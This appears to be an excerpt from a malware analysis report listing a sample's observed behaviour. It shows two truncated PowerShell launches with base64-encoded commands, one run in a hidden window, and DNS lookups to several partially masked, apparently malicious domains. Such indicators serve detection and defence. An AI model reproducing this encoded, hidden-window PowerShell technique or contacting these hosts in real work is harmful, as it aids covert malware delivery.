Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAASwBqAHIAbwBtAHQAZQBqAGMAdAB5AGwAZQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBBAG0AcAB3AGwAcQBhAHoAcwBsACAAIwA+ACAAJABPAGEAawBhAGEAZQB1AGEAZABiAHkAPQAnA...
- DNS ASK ek#######u.000webhostapp.com
- DNS ASK se#####et-handball.club
- DNS ASK fa###eb101.com
- DNS ASK el#########nikagrimmb.000webhostapp.com
- DNS ASK ar####te.capetown
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAASwBqAHIAbwBtAHQAZQBqAGMAdAB5AGwAZQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBBAG0AcAB3AGwAcQBhAHoAcwBsACAAIwA+ACAAJABPAGEAawBhAGEAZQB1AGEAZABiAHkAPQAnA...' (with hidden window)